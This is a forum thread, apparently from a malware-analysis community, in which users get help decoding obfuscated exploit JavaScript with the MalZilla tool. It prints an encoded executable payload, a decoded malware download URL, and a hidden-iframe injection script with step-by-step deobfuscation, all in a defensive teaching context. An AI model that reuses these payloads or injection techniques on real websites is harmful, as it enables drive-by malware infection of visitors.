6e6f%u656d%u746e%u7453%u6972%u676e%u0073%u014c%u7246%u6565%u6e45%u6976%u6f72%u6d6e%u6e65%u5374%u7274%u6e69%u7367%u0057%u0484%u6957%u6564%u6843%u7261%u6f54%u754d%u746c%u4269%u7479%u0065%u01c2%u6547%u4574%u766e%u7269%u6e6f%u656d%u746e%u7453%u6972%u676e%u5773%u0000%u03f0%u6553%u4874%u6e61%u6c64%u4365%u756f%u746e%u0000%u01d8%u6547%u4674%u6c69%u5465%u7079%u0065%u023c%u6547%u5374%u6174%u7472%u7075%u6e49%u6f66%u0041%u00bf%u6544%u656c%u6574%u7243%u7469%u6369%u6c61%u6553%u7463%u6f69%u006e%u02a4%u6548%u7061%u7243%u6165%u6574%u0000%u0461%u6956%u7472%u6175%u466c%u6572%u0065%u02a6%u6548%u7061%u7246%u6565%u0000%u0359%u7551%u7265%u5079%u7265%u6f66%u6d72%u6e61%u6563%u6f43%u6e75%u6574%u0072%u026a%u6547%u5474%u6369%u436b%u756f%u746e%u0000%u01ab%u6547%u4374%u7275%u6572%u746e%u7250%u636f%u7365%u4973%u0064%u0253%u6547%u5374%u7379%u6574%u546d%u6d69%u4165%u4673%u6c69%u5465%u6d69%u0065%u02e6%u434c%u614d%u5370%u7274%u6e69%u4167%u0000%u031f%u754d%u746c%u4269%u7479%u5465%u576f%u6469%u4365%u6168%u0072%u02e8%u434c%u614d%u5370%u7274%u6e69%u5767%u0000%u0240%u6547%u5374%u7274%u6e69%u5467%u7079%u4165%u0000%u0243%u6547%u5374%u7274%u6e69%u5467%u7079%u5765%u0000%u02f4%u654c%u7661%u4365%u6972%u6974%u6163%u536c%u6365%u6974%u6e6f%u0000%u00da%u6e45%u6574%u4372%u6972%u6974%u6163%u536c%u6365%u6974%u6e6f%u0000%u01e9%u6547%u4c74%u636f%u6c61%u4965%u666e%u416f%u0000%u02ba%u6e49%u7469%u6169%u696c%u657a%u7243%u7469%u6369%u6c61%u6553%u7463%u6f69%u416e%u646e%u7053%u6e69%u6f43%u6e75%u0074%u02a2%u6548%u7061%u6c41%u6f6c%u0063%u045e%u6956%u7472%u6175%u416c%u6c6c%u636f%u0000%u02a9%u6548%u7061%u6552%u6c41%u6f6c%u0063%u039a%u7452%u556c%u776e%u6e69%u0064%u02ab%u6548%u7061%u6953%u657a%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0016%u0000%u0002%u0000%u0002%u0000%u0003%u0000%u0002%u0000%u0004%u0000%u0018%u0000%u0005%u0000%u000d%u0000%u0006%u0000%u0009%u0000%u0007%u0000%u000c%u0000%u0008%u0000%u000c%u0000%u0009%u0000%u000c%u0000%u000a%u0000%u0007%u0000%u000b%u0000%u0008%u0000%u000c%u0000%u0016%u0000%u000d%u0000%u0016%u0000%u000f%u0000%u0002%u0000%u0010%u0000%u000d%u0000%u0011%u0000%u0012%u0000%u0012%u0000%u0002%u0000%u0021%u0000%u000d%u0000%u0035%u0000%u0002%u0000%u0041%u0000%u000d%u0000%u0043%u0000%u0002%u0000%u0050%u0000%u0011%u0000%u0052%u0000%u000d%u0000%u0053%u0000%u000d%u0000%u0057%u0000%u0016%u0000%u0059%u0000%u000b%u0000%u006c%u0000%u000d%u0000%u006d%u0000%u0020%u0000%u0070%u0000%u001c%u0000%u0072%u0000%u0009%u0000%u0006%u0000%u0016%u0000%u0080%u0000%u000a%u0000%u0081%u0000%u000a%u0000%u0082%u0000%u0009%u0000%u0083%u0000%u0016%u0000%u0084%u0000%u000d%u0000%u0091%u0000%u0029%u0000%u009e%u0000%u000d%u0000%u00a1%u0000%u0002%u0000%u00a4%u0000%u000b%u0000%u00a7%u0000%u000d%u0000%u00b7%u0000%u0011%u0000%u00ce%u0000%u0002%u0000%u00d7%u0000%u000b%u0000%u0718%u0000%u000c%u0000%u000c%u0000%u0008%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u0000%u0000%u0000%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6261%u6463%u6665%u6867%u6a69%u6c6b%u6e6d%u706f%u7271%u7473%u7675%u7877%u7a79%u0000%u0000%u0000%u4241%u4443%u4645%u4847%u4a49%u4c4b%u4e4d%u504f%u5251%u5453%u5655%u5857%u5a59%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u1010%u0000%u0000%u0000%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u2020%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u6100%u6362%u6564%u6766%u6968%u6b6a%u6d6c%u6f6e%u7170%u7372%u7574%u7776%u7978%u007a%u0000%u0000%u4100%u4342%u4544%u4746%u4948%u4b4a%u4d4c%u4f4e%u5150%u5352%u5554%u5756%u5958%u005a%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ua180%u0040%u0201%u0804%u03a4%u0000%u8260%u8279%u0021%u0000%u0000%u0000%udfa6%u0000%u0000%u0000%ua5a1%u0000%u0000%u0000%u9f81%ufce0%u0000%u0000%u7e40%ufc80%u0000%u0000%u03a8%u0000%ua3c1%ua3da%u0020%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ufe81%u0000%u0000%u0000%ufe40%u0000%u0000%u0000%u03b5%u0000%ua3c1%ua3da%u0020%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ufe81%u0000%u0000%u0000%ufe41%u0000%u0000%u0000%u03b6%u0000%ua2cf%ua2e4%u001a%ua2e5%ua2e8%u005b%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ufe81%u0000%u0000%u0000%u7e40%ufea1%u0000%u0000%u0551%u0000%uda51%uda5e%u0020%uda5f%uda6a%u0032%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ud381%uded8%uf9e0%u0000%u7e31%ufe81%u0000%u0000%u8bdc%u0040%ufffe%uffff%u0043%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%ua6a8%u0040%u0000%u0000%u0000%u0000%u0000%u0000%ua6a8%u0040%u0000%u0000%u0000%u0000%u0000%u0000%ua6a8%u0040%u0000%u0000%u0000%u0000%u0000%u0000%ua6a8%u0040%u0000%u0000%u0000%u0000%u0000%u0000%ua6a8%u0040%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%uaaa8%u0040%u0000%u0000%u0000%u0000%u89d8%u0040%u8e60%u0040%u8fe0%u0040%ua9e8%u0040%ua6b0%u0040%u0001%u0000%ua6b0%u0040%ua180%u0040%uffff%uffff%uffff%uffff%u362e%u0040%u0000%u0000%u0002%u0000%u87c0%u0040%u0008%u0000%u8794%u0040%u0009%u0000%u8768%u0040%u000a%u0000%u86d0%u0040%u0010%u0000%u86a4%u0040%u0011%u0000%u8674%u0040%u0012%u0000%u8650%u0040%u0013%u0000%u8624%u0040%u0018%u0000%u85ec%u0040%u0019%u0000%u85c4%u0040%u001a%u0000%u858c%u0040%u001b%u0000%u8554%u0040%u001c%u0000%u852c%u0040%u001e%u0000%u850c%u0040%u001f%u0000%u84a8%u0040%u0020%u0000%u8470%u0040%u0021%u0000%u8378%u0040%u0022%u0000%u82d8%u0040%u0078%u0000%u82c4%u0040%u0079%u0000%u82b4%u0040%u007a%u0000%u82a4%u0040%u00fc%u0000%u82a0%u0040%u00ff%u0000%u8290%u0040%u0003%u0000%u0007%u0000%u0078%u0000%u000a%u0000%uffff%uffff%u0a80%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0010%u0000%ue64e%ubb40%u19b1%u44bf%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u89d8%u0040%u8bda%u0040%u9208%u0040%u9204%u0040%u9200%u0040%u91fc%u0040%u91f8%u0040%u91f4%u0040%u91f0%u0040%u91e8%u0040%u91e0%u0040%u91d8%u0040%u91cc%u0040%u91c0%u0040%u91b8%u0040%u91ac%u0040%u91a8%u0040%u91a4%u0040%u91a0%u0040%u919c%u0040%u9198%u0040%u9194%u0040%u9190%u0040%u918c%u0040%u9188%u0040%u9184%u0040%u9180%u0040%u917c%u0040%u9174%u0040%u9168%u0040%u9160%u0040%u9158%u0040%u9198%u0040%u9150%u0040%u9148%u0040%u9140%u0040%u9134%u0040%u912c%u0040%u9120%u0040%u9114%u0040%u9110%u0040%u910c%u0040%u9100%u0040%u90ec%u0040%u90e0%u0040%u0409%u0000%u0001%u0000%u0000%u0000%ua9e8%u0040%u002e%u0000%uaaa4%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%ub27c%u0040%u7f7f%u7f7f%u7f7f%u7f7f%uaaa8%u0040%u0001%u0000%u002e%u0000%u0001%u0000%u0000%u0000%u0000%u0000%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u7577%u0040%u0000%u0000%u0000%u0000%u7080%u0000%u0001%u0000%uf1f0%uffff%u0000%u0000%u5350%u0054%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u4450%u0054%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%uab30%u0040%uab70%u0040%uffff%uffff%u0000%u0000%u0000%u0000%uffff%uffff%u0000%u0000%u0000%u0000%u0003%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0520%u1993%u0000%u0000%u0000%u0000%u0000%u0000%uffff%uffff%u001e%u0000%u003b%u0000%u005a%u0000%u0078%u0000%u0097%u0000%u00b5%u0000%u00d4%u0000%u00f3%u0000%u0111%u0000%u0130%u0000%u014e%u0000%u016d%u0000%uffff%uffff%u001e%u0000%u003a%u0000%u0059%u0000%u0077%u0000%u0096%u0000%u00b4%u0000%u00d3%u0000%u00f2%u0000%u0110%u0000%u012f%u0000%u014d%u0000%u016c%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0000%u0004%u0000%u0000%u0001%u0018%u0000%u0018%u8000%u0000%u0000%u0000%u0000%u0004%u0000%u0000%u0001%u0001%u0000%u0030%u8000%u0000%u0000%u0000%u0000%u0004%u0000%u0000%u0001%u0409%u0000%u0048%u0000%uc058%u0000%u015a%u0000%u04e4%u0000%u0000%u0000%u613c%u7373%u6d65%u6c62%u2079%u6d78%u6e6c%u3d73%u7522%u6e72%u733a%u6863%u6d65%u7361%u6d2d%u6369%u6f72%u6f73%u7466%u632d%u6d6f%u613a%u6d73%u762e%u2231%u6d20%u6e61%u6669%u7365%u5674%u7265%u6973%u6e6f%u223d%u2e31%u2230%u0d3e%u200a%u3c20%u7274%u7375%u4974%u666e%u206f%u6d78%u6e6c%u3d73%u7522%u6e72%u733a%u6863%u6d65%u7361%u6d2d%u6369%u6f72%u6f73%u7466%u632d%u6d6f%u613a%u6d73%u762e%u2233%u0d3e%u200a%u2020%u3c20%u6573%u7563%u6972%u7974%u0d3e%u200a%u2020%u2020%u3c20%u6572%u7571%u7365%u6574%u5064%u6972%u6976%u656c%u6567%u3e73%u0a0d%u2020%u2020%u2020%u2020%u723c%u7165%u6575%u7473%u6465%u7845%u6365%u7475%u6f69%u4c6e%u7665%u6c65%u6c20%u7665%u6c65%u223d%u7361%u6e49%u6f76%u656b%u2272%u7520%u4169%u6363%u7365%u3d73%u6622%u6c61%u6573%u3e22%u2f3c%u6572%u7571%u7365%u6574%u4564%u6578%u7563%u6974%u6e6f%u654c%u6576%u3e6c%u0a0d%u2020%u2020%u2020%u2f3c%u6572%u7571%u7365%u6574%u5064%u6972%u6976%u656c%u6567%u3e73%u0a0d%u2020%u2020%u2f3c%u6573%u7563%u6972%u7974%u0d3e%u200a%u3c20%u742f%u7572%u7473%u6e49%u6f66%u0d3e%u3c0a%u612f%u7373%u6d65%u6c62%u3e79%u4150%u4150%u4444%u4e49%u5847%u5058%u4441%u4944%u474e%u4150%u4444%u4e49%u5847%u5058%u4441%u4944%u474e%u4150%u4444%u4e49%u5847%u5058%u4441%u4944%u474e%u4150%u4444%u4e49%u5847%u5058%u4441%u4944%u474e%u4150%u4444%u4e49%u5847%u5058%u4441");

But when paste this code into Misc Decoders tab and try Decode UCS2 button, malzilla could not decode this script (Concatenate button is similar). So, I need your help to decode this script.

Thanks for your usefull mozilla!
Title: Re: MalZilla
Post by: bobby on March 16, 2010, 05:22:38 am
Hi denmilu,

remove var payload = unescape(" at the beginning of the script and "); at the end of script.
Click on "UCS2 to Hex" and on "Hex to bin" after that.
You will get plain EXE file.
Title: Re: MalZilla
Post by: denmilu on March 16, 2010, 07:18:33 am
Hi Bobby,

Thanks for your help but in my mazilla 1.2.0 I did not find button "Hex to bin".
Because I did not find "Hex to bin" button, So I click on " Hex to File" and after that, I got a filename.bin, and I could not read the content inside. :(

So do you have any suggestion for me to do now? I wana to find the link in this decode script.



I has just beging use mazilla, so the first time i think I will have many problems, hope you help me pass this.

Thank you!
Title: Re: MalZilla
Post by: denmilu on March 16, 2010, 07:39:32 am
I think here is a simple encode script, similar with above,

Code: [Select]
JWXNcwDTisuUZviJAX+=unescape("%u7468%u7074%u2F3A%u652F%u7078%u6F6C%u7469%u612E%u6470%u6972%u6C6C%u612E%u6973%u2F61%u616D%u776C%u7261%u3065%u2E31%u7865%u0065");

And when do as your intruction i got the link

Code: [Select]
http://exploit.apdrill.asia/malware01.exe

but with link above, i can not read the content on Bin file.

I also Attach a txt file that content encode content, but i could not decode it to view plain content inside, can you tell me how to decode it?
Title: Re: MalZilla
Post by: MysteryFCM on March 16, 2010, 10:55:25 am
Remove EVERYTHING except the USC code, and then click USC2 To Hex, then copy it and paste it into the Hex decoder tab ;) (it's got an MZ header at the top indicating it's an actual executable btw)
Title: Re: MalZilla
Post by: MysteryFCM on March 16, 2010, 10:57:21 am
Should've looked at the next page before replying, hehe.

It's Hex to File btw, not Hex to Bin ;) (on the Misc Decoders tab)
Title: Re: MalZilla
Post by: MysteryFCM on March 16, 2010, 10:58:16 am
So do you have any suggestion for me to do now? I wana to find the link in this decode script.

You can load the .bin in either the Hex Decoder tab, or download and install FileInsight ;)
Title: Re: MalZilla
Post by: denmilu on March 17, 2010, 02:03:36 am
Hi MysteryFCM,

Thanks for your help!
Now I have understood the menthod to decode this type (%uxxxx) of script, But I wonder how can we could encode a link to USC code? Do we have any tool help us to do that?

For example, we have a link 
Code: [Select]
http://www.malwaredomainlist.com So how can we encode it to a USC code?

Title: Re: MalZilla
Post by: MysteryFCM on March 17, 2010, 02:12:29 am
Why would you want to?
Title: Re: MalZilla
Post by: denmilu on March 17, 2010, 02:43:27 am
Hi MysteryFCM,

Because I'm preparing for a lecture, so I need to understand all technology that used in malicious codes. The main purpose is analysic malware, but before analysic, we need to know how it can be that (how to encode).

So I need your help! Thanks
Title: Re: MalZilla
Post by: MysteryFCM on March 17, 2010, 03:04:06 am
If it's for a lecture, I'll let you do the work and just give you a pointer ;)

http://php.net/manual/en/function.iconv.php

Would defeat the object if we did it for you ;)
Title: Re: MalZilla
Post by: denmilu on March 17, 2010, 03:14:38 am
Oh, thank you!

Actually, I want to do something by myselft and I think I can do what I want with the page you gave. It's so simple!  ;)

Title: Re: MalZilla
Post by: MysteryFCM on March 17, 2010, 03:36:16 am
No problem :)
Title: Re: MalZilla
Post by: denmilu on March 18, 2010, 09:46:39 am
Hi all,

I have a problem when use mazilla to decode a hex code, After copy a hex code and open download tab then click HEX tab,  Right click and chose "paste as hex" I will see the result that was decoded in the right conner, But with some hex code, it is could not decode. So could you show me how to use mazilla to decode some hex code that I had attached bellow.

Thanks.
Title: Re: MalZilla
Post by: MysteryFCM on March 18, 2010, 09:55:55 am
Replace the spaces with %, and remove the line breaks
Title: Re: MalZilla
Post by: denmilu on March 18, 2010, 10:35:40 am
Hi MysteryFCM,

I did it, thank you very much!  :D
Title: Re: MalZilla
Post by: denmilu on March 19, 2010, 02:42:15 am
Hi MysteryFCM,

I think i need your help again, I have two files containing encrypted content, but this encrypt is not similar with some script i have seen, So can you show me how to decode them? And do you have any intruction if I use Firebug in this case?

I have attached 2 files bellow, and waiting your answer.

Thanks
Title: Re: MalZilla
Post by: MysteryFCM on March 19, 2010, 01:53:36 pm
The first is a standard Gumblar script and decodes just fine without modification, in Malzilla.

The second requires you modify the script a bit, so the div becomes a var (using the id= as the var name). In this case;

Code: [Select]
<div style="display:none" id="aots2010">60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,106,112,99,101,114,116,46,111,114,46,106,112,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62</div>
Becomes;

Code: [Select]
var aots2010 = "60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,106,112,99,101,114,116,46,111,114,46,106,112,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62";
You then just make the necessary removal in the unescape string;

Code: [Select]
var%20ww%20%3D%20document.getElementById%28%22aots2010%22%29.innerHTML
Becomes;

Code: [Select]
var%20ww%20%3D%20aots2010
I don't use Firebug I'm afraid, so can't help with that one.
Title: Re: MalZilla
Post by: MysteryFCM on March 19, 2010, 01:57:04 pm
I forgot to mention btw, the decoded result would be;

Code: [Select]
var ww = aots2010;var xx = ww.split(",");for (i=0; i<xx.length; i++){yy = String.fromCharCode(xx[i]);document.write(yy);}
You'd then need to throw this together with the first, so it becomes;

Code: [Select]
var aots2010 = "60,105,102,114,97,109,101,32,115,114,99,61,34,104,116,116,112,58,47,47,119,119,119,46,106,112,99,101,114,116,46,111,114,46,106,112,34,32,115,116,121,108,101,61,34,100,105,115,112,108,97,121,58,110,111,110,101,59,34,32,119,105,100,116,104,61,34,48,34,32,104,101,105,103,104,116,61,34,48,34,62,60,47,105,102,114,97,109,101,62";

var c = unescape('var%20ww%20%3D%20aots2010%3Bvar%20xx%20%3D%20ww.split%28%22%2C%22%29%3Bfor%20%28i%3D0%3B%20i%3Cxx.length%3B%20i++%29%7Byy%20%3D%20String.fromCharCode%28xx%5Bi%5D%29%3Bdocument.write%28yy%29%3B%7D');eval(c);
var ww = aots2010;var xx = ww.split(",");for (i=0; i<xx.length; i++){yy = String.fromCharCode(xx[i]);document.write(yy);}

Which decodes to;

Code: [Select]
var ww = aots2010;var xx = ww.split(",");for (i=0; i<xx.length; i++){yy = String.fromCharCode(xx[i]);document.write(yy);}<iframe src="http://www.jpcert.or.jp" style="display:none;" width="0" height="0"></iframe>
Title: Re: MalZilla
Post by: denmilu on March 24, 2010, 02:21:23 am
Hi MysteryFCM,

Thanks for all of your helping, I was completed my lecture, and I think it was a success lecture. In my individual, I has learnt more about malware analysic and that will help me more on my work.
  :D
Best Regards,

Den.
Title: Re: MalZilla
Post by: MysteryFCM on March 24, 2010, 01:42:14 pm
My pleasure :)
Title: Re: MalZilla
Post by: parody on April 20, 2010, 06:19:50 am
MysteryFCM pointed out I should link my thread to here as I've spotted something for a potential update to Malzilla. :]
 
http://www.malwaredomainlist.com/forums/index.php?topic=4006.0

Exploit obfuscating itself from automated analysis with NULLs scattered throughout the file.
Title: Re: MalZilla
Post by: MysteryFCM on December 31, 2013, 10:01:42 pm
Updated user agent file for anyone using this. Let me know if there's any others that should be added.